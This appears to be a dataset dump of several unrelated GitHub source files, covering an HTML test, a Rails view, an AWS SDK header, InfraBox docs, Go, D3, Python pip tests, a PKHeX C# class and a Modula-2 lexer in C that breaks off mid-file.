<!-- Any copyright is dedicated to the Public Domain. http://creativecommons.org/publicdomain/zero/1.0/ --> <!DOCTYPE html> <style> html, body { margin: 0 } svg, div { display: inline-block; width: 700px; height: 200px } div { font: 16px sans-serif; margin-left: -700px; vertical-align: 100px } div > span { margin-left: 110px } </style> <body> <svg></svg><div><span>h<span style="padding-left: 20px"></span>e<span style="padding-left: 30px"></span>llo</span></div> </body>
{ "pile_set_name": "Github" }
<!-- Content Header (Page header) --> <section class="content-header"> <div class="container-fluid"> <div class="row mb-2"> <div class="col-sm-6"> <% content_for :title, "Manufacturers - Agencies - #{current_organization.name}" %> <h1> Manufacturers <small>for <%= current_organization.name %></small> </h1> </div> <div class="col-sm-6"> <ol class="breadcrumb float-sm-right"> <li class="breadcrumb-item"><%= link_to(dashboard_path) do %> <i class="fa fa-dashboard"></i> Home <% end %> </li> <li class="breadcrumb-item"><a href="#">Manufacturers</a></li> </ol> </div> </div> </div><!-- /.container-fluid --> </section> <section class="content"> <div class="container-fluid"> <div class="row"> <!-- left column --> <div class="col-md-12"> <!-- jquery validation --> <div class="card card-primary"> <div class="card-footer"> <div class="pull-right"> <%= new_button_to new_manufacturer_path(organization_id: current_organization), text: "New Manufacturer" %> </div> </div> </div> <!-- /.card --> </div> <!--/.col (left) --> </div> <!-- /.row --> </div><!-- /.container-fluid --> <div class="container-fluid"> <div class="row"> <div class="col-12"> <!-- Default box --> <div class="card"> <div class="card-body p-0"> <table class="table"> <thead> <tr> <th>Name</th> <th>Total Diapers</th> <th class="text-center">Actions</th> </tr> </thead> <tbody> <%= render partial: "manufacturer_row", collection: @manufacturers %> </tbody> </table> </div> </div> <!-- /.card --> </div> </div> </div> <%= render( layout: "shared/csv_import_modal", locals: { title: "Import Manufacturers", csv_template_url: "/manufacturers.csv", csv_import_url: import_csv_manufacturers_path } ) do %> <li>Open the csv file with excel or your favourite spreadsheet program.</li> <li>Delete the sample data and enter the Manufacturer names, emails and phone numbers in the appropriate columns.</li> <li>Save the file as a csv file.</li> <% end %> </section>
{ "pile_set_name": "Github" }
/** * Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. * SPDX-License-Identifier: Apache-2.0. */ #pragma once #include <aws/storagegateway/StorageGateway_EXPORTS.h> #include <aws/storagegateway/StorageGatewayRequest.h> #include <aws/core/utils/memory/stl/AWSString.h> #include <aws/core/utils/memory/stl/AWSVector.h> #include <utility> namespace Aws { namespace StorageGateway { namespace Model { /** * <p>DescribeVTLDevicesInput</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/storagegateway-2013-06-30/DescribeVTLDevicesInput">AWS * API Reference</a></p> */ class AWS_STORAGEGATEWAY_API DescribeVTLDevicesRequest : public StorageGatewayRequest { public: DescribeVTLDevicesRequest(); // Service request name is the Operation name which will send this request out, // each operation should has unique request name, so that we can get operation's name from this request. // Note: this is not true for response, multiple operations may have the same response name, // so we can not get operation's name from response. inline virtual const char* GetServiceRequestName() const override { return "DescribeVTLDevices"; } Aws::String SerializePayload() const override; Aws::Http::HeaderValueCollection GetRequestSpecificHeaders() const override; inline const Aws::String& GetGatewayARN() const{ return m_gatewayARN; } inline bool GatewayARNHasBeenSet() const { return m_gatewayARNHasBeenSet; } inline void SetGatewayARN(const Aws::String& value) { m_gatewayARNHasBeenSet = true; m_gatewayARN = value; } inline void SetGatewayARN(Aws::String&& value) { m_gatewayARNHasBeenSet = true; m_gatewayARN = std::move(value); } inline void SetGatewayARN(const char* value) { m_gatewayARNHasBeenSet = true; m_gatewayARN.assign(value); } inline DescribeVTLDevicesRequest& WithGatewayARN(const Aws::String& value) { SetGatewayARN(value); return *this;} inline DescribeVTLDevicesRequest& WithGatewayARN(Aws::String&& value) { SetGatewayARN(std::move(value)); return *this;} inline DescribeVTLDevicesRequest& WithGatewayARN(const char* value) { SetGatewayARN(value); return *this;} /** * <p>An array of strings, where each string represents the Amazon Resource Name * (ARN) of a VTL device.</p> <p>All of the specified VTL devices must be * from the same gateway. If no VTL devices are specified, the result will contain * all devices on the specified gateway.</p> */ inline const Aws::Vector<Aws::String>& GetVTLDeviceARNs() const{ return m_vTLDeviceARNs; } /** * <p>An array of strings, where each string represents the Amazon Resource Name * (ARN) of a VTL device.</p> <p>All of the specified VTL devices must be * from the same gateway. If no VTL devices are specified, the result will contain * all devices on the specified gateway.</p> */ inline bool VTLDeviceARNsHasBeenSet() const { return m_vTLDeviceARNsHasBeenSet; } /** * <p>An array of strings, where each string represents the Amazon Resource Name * (ARN) of a VTL device.</p> <p>All of the specified VTL devices must be * from the same gateway. If no VTL devices are specified, the result will contain * all devices on the specified gateway.</p> */ inline void SetVTLDeviceARNs(const Aws::Vector<Aws::String>& value) { m_vTLDeviceARNsHasBeenSet = true; m_vTLDeviceARNs = value; } /** * <p>An array of strings, where each string represents the Amazon Resource Name * (ARN) of a VTL device.</p> <p>All of the specified VTL devices must be * from the same gateway. If no VTL devices are specified, the result will contain * all devices on the specified gateway.</p> */ inline void SetVTLDeviceARNs(Aws::Vector<Aws::String>&& value) { m_vTLDeviceARNsHasBeenSet = true; m_vTLDeviceARNs = std::move(value); } /** * <p>An array of strings, where each string represents the Amazon Resource Name * (ARN) of a VTL device.</p> <p>All of the specified VTL devices must be * from the same gateway. If no VTL devices are specified, the result will contain * all devices on the specified gateway.</p> */ inline DescribeVTLDevicesRequest& WithVTLDeviceARNs(const Aws::Vector<Aws::String>& value) { SetVTLDeviceARNs(value); return *this;} /** * <p>An array of strings, where each string represents the Amazon Resource Name * (ARN) of a VTL device.</p> <p>All of the specified VTL devices must be * from the same gateway. If no VTL devices are specified, the result will contain * all devices on the specified gateway.</p> */ inline DescribeVTLDevicesRequest& WithVTLDeviceARNs(Aws::Vector<Aws::String>&& value) { SetVTLDeviceARNs(std::move(value)); return *this;} /** * <p>An array of strings, where each string represents the Amazon Resource Name * (ARN) of a VTL device.</p> <p>All of the specified VTL devices must be * from the same gateway. If no VTL devices are specified, the result will contain * all devices on the specified gateway.</p> */ inline DescribeVTLDevicesRequest& AddVTLDeviceARNs(const Aws::String& value) { m_vTLDeviceARNsHasBeenSet = true; m_vTLDeviceARNs.push_back(value); return *this; } /** * <p>An array of strings, where each string represents the Amazon Resource Name * (ARN) of a VTL device.</p> <p>All of the specified VTL devices must be * from the same gateway. If no VTL devices are specified, the result will contain * all devices on the specified gateway.</p> */ inline DescribeVTLDevicesRequest& AddVTLDeviceARNs(Aws::String&& value) { m_vTLDeviceARNsHasBeenSet = true; m_vTLDeviceARNs.push_back(std::move(value)); return *this; } /** * <p>An array of strings, where each string represents the Amazon Resource Name * (ARN) of a VTL device.</p> <p>All of the specified VTL devices must be * from the same gateway. If no VTL devices are specified, the result will contain * all devices on the specified gateway.</p> */ inline DescribeVTLDevicesRequest& AddVTLDeviceARNs(const char* value) { m_vTLDeviceARNsHasBeenSet = true; m_vTLDeviceARNs.push_back(value); return *this; } /** * <p>An opaque string that indicates the position at which to begin describing the * VTL devices.</p> */ inline const Aws::String& GetMarker() const{ return m_marker; } /** * <p>An opaque string that indicates the position at which to begin describing the * VTL devices.</p> */ inline bool MarkerHasBeenSet() const { return m_markerHasBeenSet; } /** * <p>An opaque string that indicates the position at which to begin describing the * VTL devices.</p> */ inline void SetMarker(const Aws::String& value) { m_markerHasBeenSet = true; m_marker = value; } /** * <p>An opaque string that indicates the position at which to begin describing the * VTL devices.</p> */ inline void SetMarker(Aws::String&& value) { m_markerHasBeenSet = true; m_marker = std::move(value); } /** * <p>An opaque string that indicates the position at which to begin describing the * VTL devices.</p> */ inline void SetMarker(const char* value) { m_markerHasBeenSet = true; m_marker.assign(value); } /** * <p>An opaque string that indicates the position at which to begin describing the * VTL devices.</p> */ inline DescribeVTLDevicesRequest& WithMarker(const Aws::String& value) { SetMarker(value); return *this;} /** * <p>An opaque string that indicates the position at which to begin describing the * VTL devices.</p> */ inline DescribeVTLDevicesRequest& WithMarker(Aws::String&& value) { SetMarker(std::move(value)); return *this;} /** * <p>An opaque string that indicates the position at which to begin describing the * VTL devices.</p> */ inline DescribeVTLDevicesRequest& WithMarker(const char* value) { SetMarker(value); return *this;} /** * <p>Specifies that the number of VTL devices described be limited to the * specified number.</p> */ inline int GetLimit() const{ return m_limit; } /** * <p>Specifies that the number of VTL devices described be limited to the * specified number.</p> */ inline bool LimitHasBeenSet() const { return m_limitHasBeenSet; } /** * <p>Specifies that the number of VTL devices described be limited to the * specified number.</p> */ inline void SetLimit(int value) { m_limitHasBeenSet = true; m_limit = value; } /** * <p>Specifies that the number of VTL devices described be limited to the * specified number.</p> */ inline DescribeVTLDevicesRequest& WithLimit(int value) { SetLimit(value); return *this;} private: Aws::String m_gatewayARN; bool m_gatewayARNHasBeenSet; Aws::Vector<Aws::String> m_vTLDeviceARNs; bool m_vTLDeviceARNsHasBeenSet; Aws::String m_marker; bool m_markerHasBeenSet; int m_limit; bool m_limitHasBeenSet; }; } // namespace Model } // namespace StorageGateway } // namespace Aws
{ "pile_set_name": "Github" }
# Dependency Configuration To model dependencies between jobs you simply use `depends_on` in the job definition. As an example we create tree jobs `A`, `B` and `C`. `C` depends on `A` and `B`. ```json { "version": 1, "jobs": [{ "name": "A", ... }, { "name": "B", ... }, { "name": "C", ... "depends_on": ["A", "B"] }] } ``` Jobs `A` and `B` would start in parallel and `C` would only start if `A` and `B` succeeded successfully. If either of the parent jobs failed `C` would not be started at all. You may use dependencies with all available job types. It's also possible to specify the required job state of the parent. So if you want to run the child job only if the parent has failed you can do: ```json { "version": 1, "jobs": [{ "name": "A", ... }, { "name": "B", ... "depends_on": [{"job": "A", "on": ["failure"]}] }] } ``` Possible values for `on` are: - `failure` - `finished` - `error` - `*` results in all -> `failed`, `finished`, `error` So if you have a cleanup job which you want to run allways, independent of the parent state, use `*`. ### Transfer data between jobs If you have defined dependencies between your jobs you can also transfer data between them. The parent job may produce some output which the child job may access. Every InfraBox job has automatically an output folder mounted under `/infrabox/output`. All data which is written into this directory will be accessible by the direct child jobs. The data is made accessible in the child in the `/infrabox/inputs/<parent_job_name>` directory. Suppose we have the following job definition: ```json { "version": 1, "jobs": [{ "name": "parent", ... }, { "name": "child", ... "depends_on": ["parent"] }] } ``` If the the parent job would create the file `/infrabox/output/hello_world.txt` then the child job would be able to access it under `/infrabox/inputs/parent/hello_world.txt`.
{ "pile_set_name": "Github" }
//+build !windows,!solaris,!darwin package dbus import ( "os" ) const defaultSystemBusAddress = "unix:path=/var/run/dbus/system_bus_socket" func getSystemBusPlatformAddress() string { address := os.Getenv("DBUS_SYSTEM_BUS_ADDRESS") if address != "" { return address } return defaultSystemBusAddress }
{ "pile_set_name": "Github" }
/* ------------------------------------------------------------------------------ * * # D3.js - sunbirst diagram combined * * Demo sunbirst diagram setup with interactive zoom and data update combination * * Version: 1.0 * Latest update: August 1, 2015 * * ---------------------------------------------------------------------------- */ $(function () { // Initialize Uniform plugin $('.combined-options input').uniform({ radioClass: 'choice' }); // Initialize chart sunburstZoomable('#d3-sunburst-combined', 400, 400); // Chart setup function sunburstZoomable(element, width, height) { // Basic setup // ------------------------------ // Define main variables var radius = Math.min(width, height) / 2; // Construct scales // ------------------------------ // Horizontal var x = d3.scale.linear() .range([0, 2 * Math.PI]); // Vertical var y = d3.scale.sqrt() .range([0, radius]); // Colors var color = d3.scale.category20(); // Create chart // ------------------------------ var svg = d3.select(element).append("svg") .attr("width", width) .attr("height", height) .append("g") .attr("transform", "translate(" + width / 2 + "," + height / 2 + ")"); // Construct chart layout // ------------------------------ // Partition layout var partition = d3.layout.partition() .sort(null) .value(function(d) { return 1; }); // Arc var arc = d3.svg.arc() .startAngle(function(d) { return Math.max(0, Math.min(2 * Math.PI, x(d.x))); }) .endAngle(function(d) { return Math.max(0, Math.min(2 * Math.PI, x(d.x + d.dx))); }) .innerRadius(function(d) { return Math.max(0, y(d.y)); }) .outerRadius(function(d) { return Math.max(0, y(d.y + d.dy)); }); // Load data // ------------------------------ // Keep track of the node that is currently being displayed as the root. var node; d3.json("assets/demo_data/d3/sunburst/sunburst_basic.json", function(error, root) { node = root; // Append sunbirst var path = svg.datum(root).selectAll(".d3-sunbirst") .data(partition.nodes) .enter() .append("path") .attr("class", "d3-sunbirst") .attr("d", arc) .style("fill", function(d) { return color((d.children ? d : d.parent).name); }) .on("click", click) .each(stash); // Change data d3.selectAll(".combined-options input").on("change", function change() { var value = this.value === "count" ? function() { return 1; } : function(d) { return d.size; }; // Transition path .data(partition.value(value).nodes) .transition() .duration(750) .attrTween("d", arcTweenData); }); // Animate on click function click(d) { node = d; path.transition() .duration(750) .attrTween("d", arcTweenZoom(d)); } }); // Setup for switching data: stash the old values for transition. function stash(d) { d.x0 = d.x; d.dx0 = d.dx; } // When switching data: interpolate the arcs in data space. function arcTweenData(a, i) { var oi = d3.interpolate({x: a.x0, dx: a.dx0}, a); function tween(t) { var b = oi(t); a.x0 = b.x; a.dx0 = b.dx; return arc(b); } if (i == 0) { // If we are on the first arc, adjust the x domain to match the root node // at the current zoom level. (We only need to do this once.) var xd = d3.interpolate(x.domain(), [node.x, node.x + node.dx]); return function(t) { x.domain(xd(t)); return tween(t); }; } else { return tween; } } // When zooming: interpolate the scales function arcTweenZoom(d) { var xd = d3.interpolate(x.domain(), [d.x, d.x + d.dx]), yd = d3.interpolate(y.domain(), [d.y, 1]), yr = d3.interpolate(y.range(), [d.y ? 20 : 0, radius]); return function(d, i) { return i ? function(t) { return arc(d); } : function(t) { x.domain(xd(t)); y.domain(yd(t)).range(yr(t)); return arc(d); }; }; } } });
{ "pile_set_name": "Github" }
"""This test covers 'pip install' issue #155""" import os import sys import shutil import subprocess import unittest def read_version(): # Determine the version number by reading it from the file # 'comtypes\__init__.py'. We cannot import this file (with py3, # at least) because it is in py2.x syntax. for line in open("comtypes/__init__.py"): if line.startswith("__version__ = "): var, value = line.split('=') return value.strip().strip('"').strip("'") raise NotImplementedError("__version__ is not found in __init__.py") class TestPipInstall(unittest.TestCase): def setUp(self): """prepare the same package that is usually uploaded to PyPI""" subprocess.check_call([sys.executable, 'setup.py', 'sdist', '--format=zip']) filename_for_upload = 'comtypes-%s.zip' % read_version() self.target_package = os.path.join(os.getcwd(), 'dist', filename_for_upload) self.pip_exe = os.path.join(os.path.dirname(sys.executable), 'Scripts', 'pip.exe') def test_pip_install(self): """Test that "pip install comtypes-x.y.z.zip" works""" subprocess.check_call([self.pip_exe, 'install', self.target_package]) def test_no_cache_dir_custom_location(self): """Test that 'pip install comtypes-x.y.z.zip --no-cache-dir --target="...\custom location"' works""" custom_dir = os.path.join(os.getcwd(), 'custom location') if os.path.exists(custom_dir): shutil.rmtree(custom_dir) os.makedirs(custom_dir) # this test catches issue #158 subprocess.check_call('{0} install {1} --no-cache-dir --target="{2}"' \ ''.format(self.pip_exe, self.target_package, custom_dir)) if __name__ == '__main__': unittest.main()
{ "pile_set_name": "Github" }
using System; using System.Collections.Generic; using System.Linq; namespace PKHeX.Core { /// <summary> /// Generation 4 Mystery Gift Template File (Inner Gift Data, no card data) /// </summary> public sealed class PGT : DataMysteryGift, IRibbonSetEvent3, IRibbonSetEvent4 { public const int Size = 0x104; // 260 public override int Format => 4; public override int Level { get => IsManaphyEgg ? 1 : IsPokémon ? PK.Met_Level : 0; set { if (IsPokémon) PK.Met_Level = value; } } public override int Ball { get => IsPokémon ? PK.Ball : 0; set { if (IsPokémon) PK.Ball = value; } } private enum GiftType { Pokémon = 1, PokémonEgg = 2, Item = 3, Rule = 4, Seal = 5, Accessory = 6, ManaphyEgg = 7, MemberCard = 8, OaksLetter = 9, AzureFlute = 10, PokétchApp = 11, Ribbon = 12, PokéWalkerArea = 14 } public override string CardTitle { get => "Raw Gift (PGT)"; set { } } public override int CardID { get => -1; set { } } public override bool GiftUsed { get => false; set { } } public PGT() : this(new byte[Size]) { } public PGT(byte[] data) : base(data) { } public byte CardType { get => Data[0]; set => Data[0] = value; } // Unused 0x01 public byte Slot { get => Data[2]; set => Data[2] = value; } public byte Detail { get => Data[3]; set => Data[3] = value; } public override int ItemID { get => BitConverter.ToUInt16(Data, 0x4); set => BitConverter.GetBytes((ushort)value).CopyTo(Data, 0x4); } public PK4 PK { get => _pk ??= new PK4(Data.Slice(8, PokeCrypto.SIZE_4PARTY)); set { _pk = value; var data = value.Data.All(z => z == 0) ? value.Data : PokeCrypto.EncryptArray45(value.Data); data.CopyTo(Data, 8); } } public override byte[] Write() { // Ensure PGT content is encrypted var clone = (PGT)Clone(); clone.VerifyPKEncryption(); return clone.Data; } private PK4? _pk; /// <summary> /// Double checks the encryption of the gift data for Pokemon data. /// </summary> /// <returns>True if data was encrypted, false if the data was not modified.</returns> public bool VerifyPKEncryption() { if (!IsPokémon || BitConverter.ToUInt32(Data, 0x64 + 8) != 0) return false; EncryptPK(); return true; } private void EncryptPK() { byte[] ekdata = new byte[PokeCrypto.SIZE_4PARTY]; Array.Copy(Data, 8, ekdata, 0, ekdata.Length); ekdata = PokeCrypto.EncryptArray45(ekdata); ekdata.CopyTo(Data, 8); } private GiftType PGTGiftType { get => (GiftType)Data[0]; set => Data[0] = (byte)value; } public bool IsHatched => PGTGiftType == GiftType.Pokémon; public override bool IsEgg { get => PGTGiftType == GiftType.PokémonEgg || IsManaphyEgg; set { if (value) { PGTGiftType = GiftType.PokémonEgg; PK.IsEgg = true; } } } public bool IsManaphyEgg { get => PGTGiftType == GiftType.ManaphyEgg; set { if (value) PGTGiftType = GiftType.ManaphyEgg; } } public override bool EggEncounter => IsEgg; public override bool IsItem { get => PGTGiftType == GiftType.Item; set { if (value) PGTGiftType = GiftType.Item; } } public override bool IsPokémon { get => PGTGiftType == GiftType.Pokémon || PGTGiftType == GiftType.PokémonEgg || PGTGiftType == GiftType.ManaphyEgg; set { } } public override int Species { get => IsManaphyEgg ? 490 : PK.Species; set => PK.Species = value; } public override IReadOnlyList<int> Moves { get => PK.Moves; set => PK.SetMoves(value); } public override int HeldItem { get => PK.HeldItem; set => PK.HeldItem = value; } public override bool IsShiny => PK.IsShiny; public override int Gender { get => PK.Gender; set => PK.Gender = value; } public override int Form { get => PK.AltForm; set => PK.AltForm = value; } public override int TID { get => (ushort)PK.TID; set => PK.TID = value; } public override int SID { get => (ushort)PK.SID; set => PK.SID = value; } public override string OT_Name { get => PK.OT_Name; set => PK.OT_Name = value; } public override int Location { get => PK.Met_Location; set => PK.Met_Location = value; } public override int EggLocation { get => PK.Egg_Location; set => PK.Egg_Location = value; } public override PKM ConvertToPKM(ITrainerInfo sav, EncounterCriteria criteria) { if (!IsPokémon) throw new ArgumentException(nameof(IsPokémon)); // template is already filled out, only minor mutations required PK4 pk4 = new PK4((byte[])PK.Data.Clone()) { Sanity = 0 }; if (!IsHatched && Detail == 0) { pk4.OT_Name = sav.OT; pk4.TID = sav.TID; pk4.SID = sav.SID; pk4.OT_Gender = sav.Gender; pk4.Language = sav.Language; } if (IsManaphyEgg) SetDefaultManaphyEggDetails(pk4, sav); SetPINGA(pk4, criteria); SetMetData(pk4, sav); var pi = pk4.PersonalInfo; pk4.CurrentFriendship = pk4.IsEgg ? pi.HatchCycles : pi.BaseFriendship; pk4.RefreshChecksum(); return pk4; } private void SetMetData(PK4 pk4, ITrainerInfo trainer) { if (!EggEncounter) { pk4.Met_Location = pk4.Egg_Location + 3000; pk4.Egg_Location = 0; pk4.MetDate = DateTime.Now; pk4.IsEgg = false; } else { pk4.Egg_Location += 3000; if (trainer.Generation == 4) SetUnhatchedEggDetails(pk4); else SetHatchedEggDetails(pk4); } } private static void SetDefaultManaphyEggDetails(PK4 pk4, ITrainerInfo trainer) { // Since none of this data is populated, fill in default info. pk4.Species = (int)Core.Species.Manaphy; pk4.Gender = 2; // Level 1 Moves pk4.Move1 = 294; pk4.Move1_PP = 20; pk4.Move2 = 145; pk4.Move2_PP = 30; pk4.Move3 = 346; pk4.Move3_PP = 15; pk4.Ability = (int)Ability.Hydration; pk4.FatefulEncounter = true; pk4.Ball = (int)Core.Ball.Poke; pk4.Version = GameVersion.Gen4.Contains(trainer.Game) ? trainer.Game : (int)GameVersion.D; pk4.Language = trainer.Language < (int)LanguageID.Korean ? trainer.Language : (int)LanguageID.English; pk4.Egg_Location = 1; // Ranger (will be +3000 later) } private void SetPINGA(PK4 pk4, EncounterCriteria criteria) { // Ability is forced already, can't force anything // todo: loop force the Nature/Gender // Generate IV uint seed = Util.Rand32(); if (pk4.PID == 1 || IsManaphyEgg) // Create Nonshiny seed = GeneratePID(seed, pk4); if (!IsManaphyEgg) seed = Util.Rand32(); // reseed, do not have method 1 correlation // Generate IVs if (pk4.IV32 == 0) // Ignore Nickname/Egg flag bits; none are set for varied-IV gifts. { uint iv1 = ((seed = RNG.LCRNG.Next(seed)) >> 16) & 0x7FFF; uint iv2 = ((RNG.LCRNG.Next(seed)) >> 16) & 0x7FFF; pk4.IV32 = iv1 | iv2 << 15; } } private static void SetHatchedEggDetails(PK4 pk4) { pk4.IsEgg = false; // Met Location & Date is modified when transferred to pk5; don't worry about it. pk4.EggMetDate = DateTime.Now; } private void SetUnhatchedEggDetails(PK4 pk4) { pk4.IsEgg = true; pk4.IsNicknamed = false; pk4.Nickname = SpeciesName.GetSpeciesNameGeneration(0, pk4.Language, Format); pk4.EggMetDate = DateTime.Now; } private static uint GeneratePID(uint seed, PK4 pk4) { do { uint pid1 = (seed = RNG.LCRNG.Next(seed)) >> 16; // low uint pid2 = (seed = RNG.LCRNG.Next(seed)) & 0xFFFF0000; // hi pk4.PID = pid2 | pid1; // sanity check gender for non-genderless PID cases } while (!pk4.IsGenderValid()); while (pk4.IsShiny) // Call the ARNG to change the PID pk4.PID = RNG.ARNG.Next(pk4.PID); return seed; } public static bool IsRangerManaphy(PKM pkm) { var egg = pkm.Egg_Location; if (!pkm.IsEgg) // Link Trade Egg or Ranger return egg == Locations.LinkTrade4 || egg == Locations.Ranger4; if (egg != Locations.Ranger4) return false; if (pkm.Language == (int)LanguageID.Korean) // never korean return false; var met = pkm.Met_Location; return met == Locations.LinkTrade4 || met == 0; } protected override bool IsMatchExact(PKM pkm, DexLevel evo) => false; protected override bool IsMatchDeferred(PKM pkm) => false; public bool RibbonEarth { get => PK.RibbonEarth; set => PK.RibbonEarth = value; } public bool RibbonNational { get => PK.RibbonNational; set => PK.RibbonNational = value; } public bool RibbonCountry { get => PK.RibbonCountry; set => PK.RibbonCountry = value; } public bool RibbonChampionBattle { get => PK.RibbonChampionBattle; set => PK.RibbonChampionBattle = value; } public bool RibbonChampionRegional { get => PK.RibbonChampionRegional; set => PK.RibbonChampionRegional = value; } public bool RibbonChampionNational { get => PK.RibbonChampionNational; set => PK.RibbonChampionNational = value; } public bool RibbonClassic { get => PK.RibbonClassic; set => PK.RibbonClassic = value; } public bool RibbonWishing { get => PK.RibbonWishing; set => PK.RibbonWishing = value; } public bool RibbonPremier { get => PK.RibbonPremier; set => PK.RibbonPremier = value; } public bool RibbonEvent { get => PK.RibbonEvent; set => PK.RibbonEvent = value; } public bool RibbonBirthday { get => PK.RibbonBirthday; set => PK.RibbonBirthday = value; } public bool RibbonSpecial { get => PK.RibbonSpecial; set => PK.RibbonSpecial = value; } public bool RibbonWorld { get => PK.RibbonWorld; set => PK.RibbonWorld = value; } public bool RibbonChampionWorld { get => PK.RibbonChampionWorld; set => PK.RibbonChampionWorld = value; } public bool RibbonSouvenir { get => PK.RibbonSouvenir; set => PK.RibbonSouvenir = value; } } }
{ "pile_set_name": "Github" }
#!/usr/bin/env ruby require_relative '../config/boot' require 'rake' Rake.application.run
{ "pile_set_name": "Github" }
/* * (c) copyright 1987 by the Vrije Universiteit, Amsterdam, The Netherlands. * See the copyright notice in the ACK home directory, in the file "Copyright". * * Author: Ceriel J.H. Jacobs */ /* L E X I C A L A N A L Y S E R F O R M O D U L A - 2 */ /* $Id$ */ #include <stdlib.h> #include <stdio.h> #include <string.h> #include "parameters.h" #include "debug.h" #include "alloc.h" #include "em_arith.h" #include "em_label.h" #include "assert.h" #include "LLlex.h" #include "input.h" #include "f_info.h" #include "Lpars.h" #include "class.h" #include "error.h" #include "idf.h" #include "def.h" #include "type.h" #include "warning.h" extern char *getwdir(); t_token dot, aside; struct type *toktype; int idfsize = IDFSIZE; int ForeignFlag; #ifdef DEBUG extern int cntlines; #endif int token_nmb = 0; int tk_nmb_at_last_syn_err = -ERR_SHADOW; extern char options[]; extern int flt_status; static void SkipComment(void) { /* Skip Modula-2 comments (* ... *). Note that comments may be nested (par. 3.5). */ register int ch, c; register int CommentLevel = 0; LoadChar(ch); if (ch == '$') { LoadChar(ch); switch(ch) { case 'F': /* Foreign; This definition module has an implementation in another language. In this case, don't generate prefixes in front of the names. Also, don't generate call to initialization routine. */ ForeignFlag = D_FOREIGN; break; case 'U': inidf['_'] = 1; break; case 'A': /* Extra array bound checks, on or off */ case 'R': /* Range checks, on or off */ { int on_on_minus = ch == 'R'; LoadChar(c); if (c == '-') { options[ch] = on_on_minus; break; } if (c == '+') { options[ch] = !on_on_minus; break; } ch = c; } /* fall through */ default: break; } } for (;;) { if (!(ch & 0200) && class(ch) == STNL) { LineNumber++; #ifdef DEBUG cntlines++; #endif } else if (ch == '(') { LoadChar(ch); if (ch == '*') CommentLevel++; else continue; } else if (ch == '*') { LoadChar(ch); if (ch == ')') { CommentLevel--; if (CommentLevel < 0) break; } else continue; } else if (ch == EOI) { lexerror("unterminated comment"); PushBack(); break; } LoadChar(ch); } } static struct string *GetString(int upto) { /* Read a Modula-2 string, delimited by the character "upto". */ register int ch; register struct string *str = (struct string *) Malloc((unsigned) sizeof(struct string)); register char *p; register int len; len = ISTRSIZE; str->s_str = p = Malloc((unsigned int) ISTRSIZE); while (LoadChar(ch), ch != upto) { if (!(ch & 0200) && class(ch) == STNL) { lexerror("newline in string"); LineNumber++; #ifdef DEBUG cntlines++; #endif break; } if (ch == EOI) { lexerror("end-of-file in string"); break; } *p++ = ch; if (p - str->s_str == len) { str->s_str = Realloc(str->s_str, (unsigned int) len + RSTRSIZE); p = str->s_str + len; len += RSTRSIZE; } } str->s_length = p - str->s_str; len = (str->s_length+(int)word_size) & ~((int)word_size-1); while (p - str->s_str < len) { *p++ = '\0'; } str->s_str = Realloc(str->s_str, (unsigned) len); if (str->s_length == 0) str->s_length = 1; /* ??? string length at least 1 ??? */ return str; } static char *s_error = "illegal line directive"; static int getch(void) { register int ch; while (LoadChar(ch), (ch & 0200) && ch != EOI) { error("non-ascii '\\%03o' read", ch & 0377); } return ch; } void CheckForLineDirective(void) { register int ch = getch(); register int i = 0; char buf[IDFSIZE]; register char *c = buf; for (;;) { if (ch != '#') { PushBack(); return; } do { /* * Skip to next digit * Do not skip newlines */ ch = getch(); if (class(ch) == STNL || class(ch) == STEOI) { LineNumber++; error(s_error); return; } } while (class(ch) != STNUM); while (class(ch) == STNUM) { i = i*10 + (ch - '0'); ch = getch(); } while (ch != '"' && class(ch) != STNL && class(ch) != STEOI) ch = getch(); if (ch == '"') { c = buf; do { ch = getch(); if (c < &buf[IDFSIZE]) *c++ = ch; if (class(ch) == STNL || class(ch) == STEOI) { LineNumber++; error(s_error); return; } } while (ch != '"'); *--c = '\0'; do { ch = getch(); } while (class(ch) != STNL && class(ch) != STEOI); /* * Remember the file name */ if (class(ch) == STNL && strcmp(FileName,buf)) { FileName = Salloc(buf,(unsigned) strlen(buf) + 1); WorkingDir = getwdir(FileName); } } if (class(ch) == STEOI) { error(s_error); return; } LineNumber = i; } } static void CheckForLet() { register int ch; LoadChar(ch); if (ch != EOI) { if (class(ch) == STIDF) { lexerror("token separator required between identifier and number"); } PushBack(); } } int LLlex(void) { /* LLlex() is the Lexical Analyzer. The putting aside of tokens is taken into account. */ register t_token *tk = &dot; char buf[(IDFSIZE > NUMSIZE ? IDFSIZE : NUMSIZE) + 2]; register int ch, nch; toktype = error_type; if (ASIDE) { /* a token is put aside */ *tk = aside; ASIDE = 0; return tk->tk_symb; } token_nmb++; again: ch = getch(); tk->tk_lineno = LineNumber; switch (class(ch)) { case STNL: LineNumber++; #ifdef DEBUG cntlines++; #endif CheckForLineDirective(); goto again; case STSKIP: goto again; case STGARB: if ((unsigned) ch - 040 < 0137) { lexerror("garbage char %c", ch); } else lexerror("garbage char \\%03o", ch); goto again; case STSIMP: if (ch == '(') { LoadChar(nch); if (nch == '*') { SkipComment(); goto again; } PushBack(); } if (ch == '&') return tk->tk_symb = AND; if (ch == '~') return tk->tk_symb = NOT; return tk->tk_symb = ch; case STCOMP: LoadChar(nch); switch (ch) { case '.': if (nch == '.') { return tk->tk_symb = UPTO; } break; case ':': if (nch == '=') { return tk->tk_symb = BECOMES; } break; case '<': if (nch == '=') { return tk->tk_symb = LESSEQUAL; } if (nch == '>') { return tk->tk_symb = '#'; } break; case '>': if (nch == '=') { return tk->tk_symb = GREATEREQUAL; } break; default : crash("(LLlex, STCOMP)"); } PushBack(); return tk->tk_symb = ch; case STIDF: { register char *tag = &buf[0]; register struct idf *id; do { if (tag - buf < idfsize) *tag++ = ch; LoadChar(ch); if (ch == '_' && *(tag-1) == '_') { lexerror("an identifier may not contain two consecutive underscores"); } } while(in_idf(ch)); PushBack(); *tag = '\0'; if (*(tag - 1) == '_') { lexerror("last character of an identifier may not be an underscore"); } tk->TOK_IDF = id = str2idf(buf, 1); return tk->tk_symb = id->id_reserved ? id->id_reserved : IDENT; } case STSTR: { register struct string *str = GetString(ch); if (str->s_length == 1) { tk->TOK_INT = *(str->s_str) & 0377; toktype = char_type; free(str->s_str); free((char *) str); } else { tk->tk_data.tk_str = str; if (! fit((arith)(str->s_length), (int) word_size)) { lexerror("string too long"); } toktype = standard_type(T_STRING, 1, (arith)(str->s_length)); } return tk->tk_symb = STRING; } case STNUM: { /* The problem arising with the 